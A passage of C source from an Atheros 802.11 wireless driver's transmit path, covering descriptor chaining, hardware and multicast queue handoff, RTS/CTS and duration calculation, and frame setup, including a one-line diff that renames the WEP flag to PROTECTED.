bf->bf_state.bfs_ndelim); } /* * Link the last descriptor of the previous frame * to the beginning descriptor of this frame. */ if (bf_prev != NULL) ath_hal_settxdesclink(sc->sc_ah, bf_prev->bf_lastds, bf->bf_daddr); /* Save a copy so we can link the next descriptor in */ bf_prev = bf; bf = bf->bf_next; } /* * Set the first descriptor bf_lastds field to point to * the last descriptor in the last subframe, that's where * the status update will occur. */ bf_first->bf_lastds = bf_prev->bf_lastds; /* * And bf_last in the first descriptor points to the end of * the aggregate list. */ bf_first->bf_last = bf_prev; /* * For non-AR9300 NICs, which require the rate control * in the final descriptor - let's set that up now. * * This is because the filltxdesc() HAL call doesn't * populate the last segment with rate control information * if firstSeg is also true. For non-aggregate frames * that is fine, as the first frame already has rate control * info. But if the last frame in an aggregate has one * descriptor, both firstseg and lastseg will be true and * the rate info isn't copied. * * This is inefficient on MIPS/ARM platforms that have * non-cachable memory for TX descriptors, but we'll just * make do for now. * * As to why the rate table is stashed in the last descriptor * rather than the first descriptor? Because proctxdesc() * is called on the final descriptor in an MPDU or A-MPDU - * ie, the one that gets updated by the hardware upon * completion. That way proctxdesc() doesn't need to know * about the first _and_ last TX descriptor. */ ath_hal_setuplasttxdesc(sc->sc_ah, bf_prev->bf_lastds, ds0); DPRINTF(sc, ATH_DEBUG_SW_TX_AGGR, "%s: end\n", __func__); } /* * Hand-off a frame to the multicast TX queue. * * This is a software TXQ which will be appended to the CAB queue * during the beacon setup code. * * XXX TODO: since the AR9300 EDMA TX queue support wants the QCU ID * as part of the TX descriptor, bf_state.bfs_tx_queue must be updated * with the actual hardware txq, or all of this will fall apart. * * XXX It may not be a bad idea to just stuff the QCU ID into bf_state * and retire bfs_tx_queue; then make sure the CABQ QCU ID is populated * correctly. */ static void ath_tx_handoff_mcast(struct ath_softc *sc, struct ath_txq *txq, struct ath_buf *bf) { ATH_TX_LOCK_ASSERT(sc); KASSERT((bf->bf_flags & ATH_BUF_BUSY) == 0, ("%s: busy status 0x%x", __func__, bf->bf_flags)); /* * Ensure that the tx queue is the cabq, so things get * mapped correctly. */ if (bf->bf_state.bfs_tx_queue != sc->sc_cabq->axq_qnum) { DPRINTF(sc, ATH_DEBUG_XMIT, "%s: bf=%p, bfs_tx_queue=%d, axq_qnum=%d\n", __func__, bf, bf->bf_state.bfs_tx_queue, txq->axq_qnum); } ATH_TXQ_LOCK(txq); if (ATH_TXQ_LAST(txq, axq_q_s) != NULL) { struct ath_buf *bf_last = ATH_TXQ_LAST(txq, axq_q_s); struct ieee80211_frame *wh; /* mark previous frame */ wh = mtod(bf_last->bf_m, struct ieee80211_frame *); wh->i_fc[1] |= IEEE80211_FC1_MORE_DATA; bus_dmamap_sync(sc->sc_dmat, bf_last->bf_dmamap, BUS_DMASYNC_PREWRITE); /* link descriptor */ ath_hal_settxdesclink(sc->sc_ah, bf_last->bf_lastds, bf->bf_daddr); } ATH_TXQ_INSERT_TAIL(txq, bf, bf_list); ATH_TXQ_UNLOCK(txq); } /* * Hand-off packet to a hardware queue. */ static void ath_tx_handoff_hw(struct ath_softc *sc, struct ath_txq *txq, struct ath_buf *bf) { struct ath_hal *ah = sc->sc_ah; struct ath_buf *bf_first; /* * Insert the frame on the outbound list and pass it on * to the hardware. Multicast frames buffered for power * save stations and transmit from the CAB queue are stored * on a s/w only queue and loaded on to the CAB queue in * the SWBA handler since frames only go out on DTIM and * to avoid possible races. */ ATH_TX_LOCK_ASSERT(sc); KASSERT((bf->bf_flags & ATH_BUF_BUSY) == 0, ("%s: busy status 0x%x", __func__, bf->bf_flags)); KASSERT(txq->axq_qnum != ATH_TXQ_SWQ, ("ath_tx_handoff_hw called for mcast queue")); /* * XXX racy, should hold the PCU lock when checking this, * and also should ensure that the TX counter is >0! */ KASSERT((sc->sc_inreset_cnt == 0), ("%s: TX during reset?\n", __func__)); #if 0 /* * This causes a LOR. Find out where the PCU lock is being * held whilst the TXQ lock is grabbed - that shouldn't * be occuring. */ ATH_PCU_LOCK(sc); if (sc->sc_inreset_cnt) { ATH_PCU_UNLOCK(sc); DPRINTF(sc, ATH_DEBUG_RESET, "%s: called with sc_in_reset != 0\n", __func__); DPRINTF(sc, ATH_DEBUG_XMIT, "%s: queued: TXDP[%u] = %p (%p) depth %d\n", __func__, txq->axq_qnum, (caddr_t)bf->bf_daddr, bf->bf_desc, txq->axq_depth); /* XXX axq_link needs to be set and updated! */ ATH_TXQ_INSERT_TAIL(txq, bf, bf_list); if (bf->bf_state.bfs_aggr) txq->axq_aggr_depth++; return; } ATH_PCU_UNLOCK(sc); #endif ATH_TXQ_LOCK(txq); /* * XXX TODO: if there's a holdingbf, then * ATH_TXQ_PUTRUNNING should be clear. * * If there is a holdingbf and the list is empty, * then axq_link should be pointing to the holdingbf. * * Otherwise it should point to the last descriptor * in the last ath_buf. * * In any case, we should really ensure that we * update the previous descriptor link pointer to * this descriptor, regardless of all of the above state. * * For now this is captured by having axq_link point * to either the holdingbf (if the TXQ list is empty) * or the end of the list (if the TXQ list isn't empty.) * I'd rather just kill axq_link here and do it as above. */ /* * Append the frame to the TX queue. */ ATH_TXQ_INSERT_TAIL(txq, bf, bf_list); ATH_KTR(sc, ATH_KTR_TX, 3, "ath_tx_handoff: non-tdma: txq=%u, add bf=%p " "depth=%d", txq->axq_qnum, bf, txq->axq_depth); /* * If there's a link pointer, update it. * * XXX we should replace this with the above logic, just * to kill axq_link with fire. */ if (txq->axq_link != NULL) { *txq->axq_link = bf->bf_daddr; DPRINTF(sc, ATH_DEBUG_XMIT, "%s: link[%u](%p)=%p (%p) depth %d\n", __func__, txq->axq_qnum, txq->axq_link, (caddr_t)bf->bf_daddr, bf->bf_desc, txq->axq_depth); ATH_KTR(sc, ATH_KTR_TX, 5, "ath_tx_handoff: non-tdma: link[%u](%p)=%p (%p) " "lastds=%d", txq->axq_qnum, txq->axq_link, (caddr_t)bf->bf_daddr, bf->bf_desc, bf->bf_lastds); } /* * If we've not pushed anything into the hardware yet, * push the head of the queue into the TxDP. * * Once we've started DMA, there's no guarantee that * updating the TxDP with a new value will actually work. * So we just don't do that - if we hit the end of the list, * we keep that buffer around (the "holding buffer") and * re-start DMA by updating the link pointer of _that_ * descriptor and then restart DMA. */ if (! (txq->axq_flags & ATH_TXQ_PUTRUNNING)) { bf_first = TAILQ_FIRST(&txq->axq_q); txq->axq_flags |= ATH_TXQ_PUTRUNNING; ath_hal_puttxbuf(ah, txq->axq_qnum, bf_first->bf_daddr); DPRINTF(sc, ATH_DEBUG_XMIT, "%s: TXDP[%u] = %p (%p) depth %d\n", __func__, txq->axq_qnum, (caddr_t)bf_first->bf_daddr, bf_first->bf_desc, txq->axq_depth); ATH_KTR(sc, ATH_KTR_TX, 5, "ath_tx_handoff: TXDP[%u] = %p (%p) " "lastds=%p depth %d", txq->axq_qnum, (caddr_t)bf_first->bf_daddr, bf_first->bf_desc, bf_first->bf_lastds, txq->axq_depth); } /* * Ensure that the bf TXQ matches this TXQ, so later * checking and holding buffer manipulation is sane. */ if (bf->bf_state.bfs_tx_queue != txq->axq_qnum) { DPRINTF(sc, ATH_DEBUG_XMIT, "%s: bf=%p, bfs_tx_queue=%d, axq_qnum=%d\n", __func__, bf, bf->bf_state.bfs_tx_queue, txq->axq_qnum); } /* * Track aggregate queue depth. */ if (bf->bf_state.bfs_aggr) txq->axq_aggr_depth++; /* * Update the link pointer. */ ath_hal_gettxdesclinkptr(ah, bf->bf_lastds, &txq->axq_link); /* * Start DMA. * * If we wrote a TxDP above, DMA will start from here. * * If DMA is running, it'll do nothing. * * If the DMA engine hit the end of the QCU list (ie LINK=NULL, * or VEOL) then it stops at the last transmitted write. * We then append a new frame by updating the link pointer * in that descriptor and then kick TxE here; it will re-read * that last descriptor and find the new descriptor to transmit. * * This is why we keep the holding descriptor around. */ ath_hal_txstart(ah, txq->axq_qnum); ATH_TXQ_UNLOCK(txq); ATH_KTR(sc, ATH_KTR_TX, 1, "ath_tx_handoff: txq=%u, txstart", txq->axq_qnum); } /* * Restart TX DMA for the given TXQ. * * This must be called whether the queue is empty or not. */ static void ath_legacy_tx_dma_restart(struct ath_softc *sc, struct ath_txq *txq) { struct ath_buf *bf, *bf_last; ATH_TXQ_LOCK_ASSERT(txq); /* XXX make this ATH_TXQ_FIRST */ bf = TAILQ_FIRST(&txq->axq_q); bf_last = ATH_TXQ_LAST(txq, axq_q_s); if (bf == NULL) return; DPRINTF(sc, ATH_DEBUG_RESET, "%s: Q%d: bf=%p, bf_last=%p, daddr=0x%08x\n", __func__, txq->axq_qnum, bf, bf_last, (uint32_t) bf->bf_daddr); #ifdef ATH_DEBUG if (sc->sc_debug & ATH_DEBUG_RESET) ath_tx_dump(sc, txq); #endif /* * This is called from a restart, so DMA is known to be * completely stopped. */ KASSERT((!(txq->axq_flags & ATH_TXQ_PUTRUNNING)), ("%s: Q%d: called with PUTRUNNING=1\n", __func__, txq->axq_qnum)); ath_hal_puttxbuf(sc->sc_ah, txq->axq_qnum, bf->bf_daddr); txq->axq_flags |= ATH_TXQ_PUTRUNNING; ath_hal_gettxdesclinkptr(sc->sc_ah, bf_last->bf_lastds, &txq->axq_link); ath_hal_txstart(sc->sc_ah, txq->axq_qnum); } /* * Hand off a packet to the hardware (or mcast queue.) * * The relevant hardware txq should be locked. */ static void ath_legacy_xmit_handoff(struct ath_softc *sc, struct ath_txq *txq, struct ath_buf *bf) { ATH_TX_LOCK_ASSERT(sc); #ifdef ATH_DEBUG_ALQ if (if_ath_alq_checkdebug(&sc->sc_alq, ATH_ALQ_EDMA_TXDESC)) ath_tx_alq_post(sc, bf); #endif if (txq->axq_qnum == ATH_TXQ_SWQ) ath_tx_handoff_mcast(sc, txq, bf); else ath_tx_handoff_hw(sc, txq, bf); } static int ath_tx_tag_crypto(struct ath_softc *sc, struct ieee80211_node *ni, struct mbuf *m0, int iswep, int isfrag, int *hdrlen, int *pktlen, int *keyix) { DPRINTF(sc, ATH_DEBUG_XMIT, "%s: hdrlen=%d, pktlen=%d, isfrag=%d, iswep=%d, m0=%p\n", __func__, *hdrlen, *pktlen, isfrag, iswep, m0); if (iswep) { const struct ieee80211_cipher *cip; struct ieee80211_key *k; /* * Construct the 802.11 header+trailer for an encrypted * frame. The only reason this can fail is because of an * unknown or unsupported cipher/key type. */ k = ieee80211_crypto_encap(ni, m0); if (k == NULL) { /* * This can happen when the key is yanked after the * frame was queued. Just discard the frame; the * 802.11 layer counts failures and provides * debugging/diagnostics. */ return (0); } /* * Adjust the packet + header lengths for the crypto * additions and calculate the h/w key index. When * a s/w mic is done the frame will have had any mic * added to it prior to entry so m0->m_pkthdr.len will * account for it. Otherwise we need to add it to the * packet length. */ cip = k->wk_cipher; (*hdrlen) += cip->ic_header; (*pktlen) += cip->ic_header + cip->ic_trailer; /* NB: frags always have any TKIP MIC done in s/w */ if ((k->wk_flags & IEEE80211_KEY_SWMIC) == 0 && !isfrag) (*pktlen) += cip->ic_miclen; (*keyix) = k->wk_keyix; } else if (ni->ni_ucastkey.wk_cipher == &ieee80211_cipher_none) { /* * Use station key cache slot, if assigned. */ (*keyix) = ni->ni_ucastkey.wk_keyix; if ((*keyix) == IEEE80211_KEYIX_NONE) (*keyix) = HAL_TXKEYIX_INVALID; } else (*keyix) = HAL_TXKEYIX_INVALID; return (1); } /* * Calculate whether interoperability protection is required for * this frame. * * This requires the rate control information be filled in, * as the protection requirement depends upon the current * operating mode / PHY. */ static void ath_tx_calc_protection(struct ath_softc *sc, struct ath_buf *bf) { struct ieee80211_frame *wh; uint8_t rix; uint16_t flags; int shortPreamble; const HAL_RATE_TABLE *rt = sc->sc_currates; struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; flags = bf->bf_state.bfs_txflags; rix = bf->bf_state.bfs_rc[0].rix; shortPreamble = bf->bf_state.bfs_shpream; wh = mtod(bf->bf_m, struct ieee80211_frame *); /* * If 802.11g protection is enabled, determine whether * to use RTS/CTS or just CTS. Note that this is only * done for OFDM unicast frames. */ if ((ic->ic_flags & IEEE80211_F_USEPROT) && rt->info[rix].phy == IEEE80211_T_OFDM && (flags & HAL_TXDESC_NOACK) == 0) { bf->bf_state.bfs_doprot = 1; /* XXX fragments must use CCK rates w/ protection */ if (ic->ic_protmode == IEEE80211_PROT_RTSCTS) { flags |= HAL_TXDESC_RTSENA; } else if (ic->ic_protmode == IEEE80211_PROT_CTSONLY) { flags |= HAL_TXDESC_CTSENA; } /* * For frags it would be desirable to use the * highest CCK rate for RTS/CTS. But stations * farther away may detect it at a lower CCK rate * so use the configured protection rate instead * (for now). */ sc->sc_stats.ast_tx_protect++; } /* * If 11n protection is enabled and it's a HT frame, * enable RTS. * * XXX ic_htprotmode or ic_curhtprotmode? * XXX should it_htprotmode only matter if ic_curhtprotmode * XXX indicates it's not a HT pure environment? */ if ((ic->ic_htprotmode == IEEE80211_PROT_RTSCTS) && rt->info[rix].phy == IEEE80211_T_HT && (flags & HAL_TXDESC_NOACK) == 0) { flags |= HAL_TXDESC_RTSENA; sc->sc_stats.ast_tx_htprotect++; } bf->bf_state.bfs_txflags = flags; } /* * Update the frame duration given the currently selected rate. * * This also updates the frame duration value, so it will require * a DMA flush. */ static void ath_tx_calc_duration(struct ath_softc *sc, struct ath_buf *bf) { struct ieee80211_frame *wh; uint8_t rix; uint16_t flags; int shortPreamble; struct ath_hal *ah = sc->sc_ah; const HAL_RATE_TABLE *rt = sc->sc_currates; int isfrag = bf->bf_m->m_flags & M_FRAG; flags = bf->bf_state.bfs_txflags; rix = bf->bf_state.bfs_rc[0].rix; shortPreamble = bf->bf_state.bfs_shpream; wh = mtod(bf->bf_m, struct ieee80211_frame *); /* * Calculate duration. This logically belongs in the 802.11 * layer but it lacks sufficient information to calculate it. */ if ((flags & HAL_TXDESC_NOACK) == 0 && (wh->i_fc[0] & IEEE80211_FC0_TYPE_MASK) != IEEE80211_FC0_TYPE_CTL) { u_int16_t dur; if (shortPreamble) dur = rt->info[rix].spAckDuration; else dur = rt->info[rix].lpAckDuration; if (wh->i_fc[1] & IEEE80211_FC1_MORE_FRAG) { dur += dur; /* additional SIFS+ACK */ /* * Include the size of next fragment so NAV is * updated properly. The last fragment uses only * the ACK duration * * XXX TODO: ensure that the rate lookup for each * fragment is the same as the rate used by the * first fragment! */ dur += ath_hal_computetxtime(ah, rt, bf->bf_nextfraglen, rix, shortPreamble); } if (isfrag) { /* * Force hardware to use computed duration for next * fragment by disabling multi-rate retry which updates * duration based on the multi-rate duration table. */ bf->bf_state.bfs_ismrr = 0; bf->bf_state.bfs_try0 = ATH_TXMGTTRY; /* XXX update bfs_rc[0].try? */ } /* Update the duration field itself */ *(u_int16_t *)wh->i_dur = htole16(dur); } } static uint8_t ath_tx_get_rtscts_rate(struct ath_hal *ah, const HAL_RATE_TABLE *rt, int cix, int shortPreamble) { uint8_t ctsrate; /* * CTS transmit rate is derived from the transmit rate * by looking in the h/w rate table. We must also factor * in whether or not a short preamble is to be used. */ /* NB: cix is set above where RTS/CTS is enabled */ KASSERT(cix != 0xff, ("cix not setup")); ctsrate = rt->info[cix].rateCode; /* XXX this should only matter for legacy rates */ if (shortPreamble) ctsrate |= rt->info[cix].shortPreamble; return (ctsrate); } /* * Calculate the RTS/CTS duration for legacy frames. */ static int ath_tx_calc_ctsduration(struct ath_hal *ah, int rix, int cix, int shortPreamble, int pktlen, const HAL_RATE_TABLE *rt, int flags) { int ctsduration = 0; /* This mustn't be called for HT modes */ if (rt->info[cix].phy == IEEE80211_T_HT) { printf("%s: HT rate where it shouldn't be (0x%x)\n", __func__, rt->info[cix].rateCode); return (-1); } /* * Compute the transmit duration based on the frame * size and the size of an ACK frame. We call into the * HAL to do the computation since it depends on the * characteristics of the actual PHY being used. * * NB: CTS is assumed the same size as an ACK so we can * use the precalculated ACK durations. */ if (shortPreamble) { if (flags & HAL_TXDESC_RTSENA) /* SIFS + CTS */ ctsduration += rt->info[cix].spAckDuration; ctsduration += ath_hal_computetxtime(ah, rt, pktlen, rix, AH_TRUE); if ((flags & HAL_TXDESC_NOACK) == 0) /* SIFS + ACK */ ctsduration += rt->info[rix].spAckDuration; } else { if (flags & HAL_TXDESC_RTSENA) /* SIFS + CTS */ ctsduration += rt->info[cix].lpAckDuration; ctsduration += ath_hal_computetxtime(ah, rt, pktlen, rix, AH_FALSE); if ((flags & HAL_TXDESC_NOACK) == 0) /* SIFS + ACK */ ctsduration += rt->info[rix].lpAckDuration; } return (ctsduration); } /* * Update the given ath_buf with updated rts/cts setup and duration * values. * * To support rate lookups for each software retry, the rts/cts rate * and cts duration must be re-calculated. * * This function assumes the RTS/CTS flags have been set as needed; * mrr has been disabled; and the rate control lookup has been done. * * XXX TODO: MRR need only be disabled for the pre-11n NICs. * XXX The 11n NICs support per-rate RTS/CTS configuration. */ static void ath_tx_set_rtscts(struct ath_softc *sc, struct ath_buf *bf) { uint16_t ctsduration = 0; uint8_t ctsrate = 0; uint8_t rix = bf->bf_state.bfs_rc[0].rix; uint8_t cix = 0; const HAL_RATE_TABLE *rt = sc->sc_currates; /* * No RTS/CTS enabled? Don't bother. */ if ((bf->bf_state.bfs_txflags & (HAL_TXDESC_RTSENA | HAL_TXDESC_CTSENA)) == 0) { /* XXX is this really needed? */ bf->bf_state.bfs_ctsrate = 0; bf->bf_state.bfs_ctsduration = 0; return; } /* * If protection is enabled, use the protection rix control * rate. Otherwise use the rate0 control rate. */ if (bf->bf_state.bfs_doprot) rix = sc->sc_protrix; else rix = bf->bf_state.bfs_rc[0].rix; /* * If the raw path has hard-coded ctsrate0 to something, * use it. */ if (bf->bf_state.bfs_ctsrate0 != 0) cix = ath_tx_findrix(sc, bf->bf_state.bfs_ctsrate0); else /* Control rate from above */ cix = rt->info[rix].controlRate; /* Calculate the rtscts rate for the given cix */ ctsrate = ath_tx_get_rtscts_rate(sc->sc_ah, rt, cix, bf->bf_state.bfs_shpream); /* The 11n chipsets do ctsduration calculations for you */ if (! ath_tx_is_11n(sc)) ctsduration = ath_tx_calc_ctsduration(sc->sc_ah, rix, cix, bf->bf_state.bfs_shpream, bf->bf_state.bfs_pktlen, rt, bf->bf_state.bfs_txflags); /* Squirrel away in ath_buf */ bf->bf_state.bfs_ctsrate = ctsrate; bf->bf_state.bfs_ctsduration = ctsduration; /* * Must disable multi-rate retry when using RTS/CTS. */ if (!sc->sc_mrrprot) { bf->bf_state.bfs_ismrr = 0; bf->bf_state.bfs_try0 = bf->bf_state.bfs_rc[0].tries = ATH_TXMGTTRY; /* XXX ew */ } } /* * Setup the descriptor chain for a normal or fast-frame * frame. * * XXX TODO: extend to include the destination hardware QCU ID. * Make sure that is correct. Make sure that when being added * to the mcastq, the CABQ QCUID is set or things will get a bit * odd. */ static void ath_tx_setds(struct ath_softc *sc, struct ath_buf *bf) { struct ath_desc *ds = bf->bf_desc; struct ath_hal *ah = sc->sc_ah; if (bf->bf_state.bfs_txrate0 == 0) DPRINTF(sc, ATH_DEBUG_XMIT, "%s: bf=%p, txrate0=%d\n", __func__, bf, 0); ath_hal_setuptxdesc(ah, ds , bf->bf_state.bfs_pktlen /* packet length */ , bf->bf_state.bfs_hdrlen /* header length */ , bf->bf_state.bfs_atype /* Atheros packet type */ , bf->bf_state.bfs_txpower /* txpower */ , bf->bf_state.bfs_txrate0 , bf->bf_state.bfs_try0 /* series 0 rate/tries */ , bf->bf_state.bfs_keyix /* key cache index */ , bf->bf_state.bfs_txantenna /* antenna mode */ , bf->bf_state.bfs_txflags /* flags */ , bf->bf_state.bfs_ctsrate /* rts/cts rate */ , bf->bf_state.bfs_ctsduration /* rts/cts duration */ ); /* * This will be overriden when the descriptor chain is written. */ bf->bf_lastds = ds; bf->bf_last = bf; /* Set rate control and descriptor chain for this frame */ ath_tx_set_ratectrl(sc, bf->bf_node, bf); ath_tx_chaindesclist(sc, ds, bf, 0, 0, 0); } /* * Do a rate lookup. * * This performs a rate lookup for the given ath_buf only if it's required. * Non-data frames and raw frames don't require it. * * This populates the primary and MRR entries; MRR values are * then disabled later on if something requires it (eg RTS/CTS on * pre-11n chipsets. * * This needs to be done before the RTS/CTS fields are calculated * as they may depend upon the rate chosen. */ static void ath_tx_do_ratelookup(struct ath_softc *sc, struct ath_buf *bf) { uint8_t rate, rix; int try0; if (! bf->bf_state.bfs_doratelookup) return; /* Get rid of any previous state */ bzero(bf->bf_state.bfs_rc, sizeof(bf->bf_state.bfs_rc)); ATH_NODE_LOCK(ATH_NODE(bf->bf_node)); ath_rate_findrate(sc, ATH_NODE(bf->bf_node), bf->bf_state.bfs_shpream, bf->bf_state.bfs_pktlen, &rix, &try0, &rate); /* In case MRR is disabled, make sure rc[0] is setup correctly */ bf->bf_state.bfs_rc[0].rix = rix; bf->bf_state.bfs_rc[0].ratecode = rate; bf->bf_state.bfs_rc[0].tries = try0; if (bf->bf_state.bfs_ismrr && try0 != ATH_TXMAXTRY) ath_rate_getxtxrates(sc, ATH_NODE(bf->bf_node), rix, bf->bf_state.bfs_rc); ATH_NODE_UNLOCK(ATH_NODE(bf->bf_node)); sc->sc_txrix = rix; /* for LED blinking */ sc->sc_lastdatarix = rix; /* for fast frames */ bf->bf_state.bfs_try0 = try0; bf->bf_state.bfs_txrate0 = rate; } /* * Update the CLRDMASK bit in the ath_buf if it needs to be set. */ static void ath_tx_update_clrdmask(struct ath_softc *sc, struct ath_tid *tid, struct ath_buf *bf) { struct ath_node *an = ATH_NODE(bf->bf_node); ATH_TX_LOCK_ASSERT(sc); if (an->clrdmask == 1) { bf->bf_state.bfs_txflags |= HAL_TXDESC_CLRDMASK; an->clrdmask = 0; } } /* * Return whether this frame should be software queued or * direct dispatched. * * When doing powersave, BAR frames should be queued but other management * frames should be directly sent. * * When not doing powersave, stick BAR frames into the hardware queue * so it goes out even though the queue is paused. * * For now, management frames are also software queued by default. */ static int ath_tx_should_swq_frame(struct ath_softc *sc, struct ath_node *an, struct mbuf *m0, int *queue_to_head) { struct ieee80211_node *ni = &an->an_node; struct ieee80211_frame *wh; uint8_t type, subtype; wh = mtod(m0, struct ieee80211_frame *); type = wh->i_fc[0] & IEEE80211_FC0_TYPE_MASK; subtype = wh->i_fc[0] & IEEE80211_FC0_SUBTYPE_MASK; (*queue_to_head) = 0; /* If it's not in powersave - direct-dispatch BAR */ if ((ATH_NODE(ni)->an_is_powersave == 0) && type == IEEE80211_FC0_TYPE_CTL && subtype == IEEE80211_FC0_SUBTYPE_BAR) { DPRINTF(sc, ATH_DEBUG_SW_TX, "%s: BAR: TX'ing direct\n", __func__); return (0); } else if ((ATH_NODE(ni)->an_is_powersave == 1) && type == IEEE80211_FC0_TYPE_CTL && subtype == IEEE80211_FC0_SUBTYPE_BAR) { /* BAR TX whilst asleep; queue */ DPRINTF(sc, ATH_DEBUG_SW_TX, "%s: swq: TX'ing\n", __func__); (*queue_to_head) = 1; return (1); } else if ((ATH_NODE(ni)->an_is_powersave == 1) && (type == IEEE80211_FC0_TYPE_MGT || type == IEEE80211_FC0_TYPE_CTL)) { /* * Other control/mgmt frame; bypass software queuing * for now! */ DPRINTF(sc, ATH_DEBUG_XMIT, "%s: %6D: Node is asleep; sending mgmt " "(type=%d, subtype=%d)\n", __func__, ni->ni_macaddr, ":", type, subtype); return (0); } else { return (1); } } /* * Transmit the given frame to the hardware. * * The frame must already be setup; rate control must already have * been done. * * XXX since the TXQ lock is being held here (and I dislike holding * it for this long when not doing software aggregation), later on * break this function into "setup_normal" and "xmit_normal". The * lock only needs to be held for the ath_tx_handoff call. * * XXX we don't update the leak count here - if we're doing * direct frame dispatch, we need to be able to do it without * decrementing the leak count (eg multicast queue frames.) */ static void ath_tx_xmit_normal(struct ath_softc *sc, struct ath_txq *txq, struct ath_buf *bf) { struct ath_node *an = ATH_NODE(bf->bf_node); struct ath_tid *tid = &an->an_tid[bf->bf_state.bfs_tid]; ATH_TX_LOCK_ASSERT(sc); /* * For now, just enable CLRDMASK. ath_tx_xmit_normal() does * set a completion handler however it doesn't (yet) properly * handle the strict ordering requirements needed for normal, * non-aggregate session frames. * * Once this is implemented, only set CLRDMASK like this for * frames that must go out - eg management/raw frames. */ bf->bf_state.bfs_txflags |= HAL_TXDESC_CLRDMASK; /* Setup the descriptor before handoff */ ath_tx_do_ratelookup(sc, bf); ath_tx_calc_duration(sc, bf); ath_tx_calc_protection(sc, bf); ath_tx_set_rtscts(sc, bf); ath_tx_rate_fill_rcflags(sc, bf); ath_tx_setds(sc, bf); /* Track per-TID hardware queue depth correctly */ tid->hwq_depth++; /* Assign the completion handler */ bf->bf_comp = ath_tx_normal_comp; /* Hand off to hardware */ ath_tx_handoff(sc, txq, bf); } /* * Do the basic frame setup stuff that's required before the frame * is added to a software queue. * * All frames get mostly the same treatment and it's done once. * Retransmits fiddle with things like the rate control setup, * setting the retransmit bit in the packet; doing relevant DMA/bus * syncing and relinking it (back) into the hardware TX queue. * * Note that this may cause the mbuf to be reallocated, so * m0 may not be valid. */ static int ath_tx_normal_setup(struct ath_softc *sc, struct ieee80211_node *ni, struct ath_buf *bf, struct mbuf *m0, struct ath_txq *txq) { struct ieee80211vap *vap = ni->ni_vap; struct ath_hal *ah = sc->sc_ah; struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; const struct chanAccParams *cap = &ic->ic_wme.wme_chanParams; int error, iswep, ismcast, isfrag, ismrr; int keyix, hdrlen, pktlen, try0 = 0; u_int8_t rix = 0, txrate = 0; struct ath_desc *ds; struct ieee80211_frame *wh; u_int subtype, flags; HAL_PKT_TYPE atype; const HAL_RATE_TABLE *rt; HAL_BOOL shortPreamble; struct ath_node *an; u_int pri; /* * To ensure that both sequence numbers and the CCMP PN handling * is "correct", make sure that the relevant TID queue is locked. * Otherwise the CCMP PN and seqno may appear out of order, causing * re-ordered frames to have out of order CCMP PN's, resulting * in many, many frame drops. */ ATH_TX_LOCK_ASSERT(sc); wh = mtod(m0, struct ieee80211_frame *); - iswep = wh->i_fc[1] & IEEE80211_FC1_WEP; + iswep = wh->i_fc[1] & IEEE80211_FC1_PROTECTED; ismcast = IEEE80211_IS_MULTICAST(wh->i_addr1); isfrag = m0->m_flags & M_FRAG; hdrlen = ieee80211_anyhdrsize(wh); /* * Packet length must not include any * pad bytes; deduct them here. */ pktlen = m0->m_pkthdr.len - (hdrlen & 3); /* Handle encryption twiddling if needed */ if (! ath_tx_tag_crypto(sc, ni, m0, iswep, isfrag, &hdrlen, &pktlen, &keyix)) { ath_freetx(m0); return EIO; } /* packet header may have moved, reset our local pointer */ wh = mtod(m0, struct ieee80211_frame *); pktlen += IEEE80211_CRC_LEN; /* * Load the DMA map so any coalescing is done. This * also calculates the number of descriptors we need. */ error = ath_tx_dmasetup(sc, bf, m0); if (error != 0) return error; bf->bf_node = ni; /* NB: held reference */ m0 = bf->bf_m; /* NB: may have changed */ wh = mtod(m0, struct ieee80211_frame *); /* setup descriptors */ ds = bf->bf_desc; rt = sc->sc_currates; KASSERT(rt != NULL, ("no rate table, mode %u", sc->sc_curmode)); /* * NB: the 802.11 layer marks whether or not we should * use short preamble based on the current mode and * negotiated parameters. */ if ((ic->ic_flags & IEEE80211_F_SHPREAMBLE) && (ni->ni_capinfo & IEEE80211_CAPINFO_SHORT_PREAMBLE)) { shortPreamble = AH_TRUE; sc->sc_stats.ast_tx_shortpre++; } else { shortPreamble = AH_FALSE; } an = ATH_NODE(ni); //flags = HAL_TXDESC_CLRDMASK; /* XXX needed for crypto errs */ flags = 0; ismrr = 0; /* default no multi-rate retry*/ pri = M_WME_GETAC(m0); /* honor classification */ /* XXX use txparams instead of fixed values */ /* * Calculate Atheros packet type from IEEE80211 packet header, * setup for rate calculations, and select h/w transmit queue. */ switch (wh->i_fc[0] & IEEE80211_FC0_TYPE_MASK) { case IEEE80211_FC0_TYPE_MGT: subtype = wh->i_fc[0] & IEEE80211_FC0_SUBTYPE_MASK; if (subtype == IEEE80211_FC0_SUBTYPE_BEACON) atype = HAL_PKT_TYPE_BEACON; else if (subtype == IEEE80211_FC0_SUBTYPE_PROBE_RESP) atype = HAL_PKT_TYPE_PROBE_RESP; else if (subtype == IEEE80211_FC0_SUBTYPE_ATIM) atype = HAL_PKT_TYPE_ATIM; else atype = HAL_PKT_TYPE_NORMAL; /* XXX */ rix = an->an_mgmtrix; txrate = rt->info[rix].rateCode; if (shortPreamble) txrate |= rt->info[rix].shortPreamble; try0 = ATH_TXMGTTRY; flags |= HAL_TXDESC_INTREQ; /* force interrupt */ break; case IEEE80211_FC0_TYPE_CTL: atype = HAL_PKT_TYPE_PSPOLL; /* stop setting of duration */ rix = an->an_mgmtrix; txrate = rt->info[rix].rateCode; if (shortPreamble) txrate |= rt->info[rix].shortPreamble; try0 = ATH_TXMGTTRY; flags |= HAL_TXDESC_INTREQ; /* force interrupt */ break; case IEEE80211_FC0_TYPE_DATA: atype = HAL_PKT_TYPE_NORMAL; /* default */ /* * Data frames: multicast frames go out at a fixed rate, * EAPOL frames use the mgmt frame rate; otherwise consult * the rate control module for the rate to use. */ if (ismcast) { rix = an->an_mcastrix; txrate = rt->info[rix].rateCode; if (shortPreamble) txrate |= rt->info[rix].shortPreamble; try0 = 1; } else if (m0->m_flags & M_EAPOL) { /* XXX? maybe always use long preamble? */ rix = an->an_mgmtrix; txrate = rt->info[rix].rateCode; if (shortPreamble) txrate |= rt->info[rix].shortPreamble; try0 = ATH_TXMAXTRY; /* XXX?too many? */ } else { /* * Do rate lookup on each TX, rather than using * the hard-coded TX information decided here. */ ismrr = 1; bf->bf_state.bfs_doratelookup = 1; } if (cap->cap_wmeParams[pri].wmep_noackPolicy) flags |= HAL_TXDESC_NOACK; break; default: if_printf(ifp, "bogus frame type 0x%x (%s)\n", wh->i_fc[0] 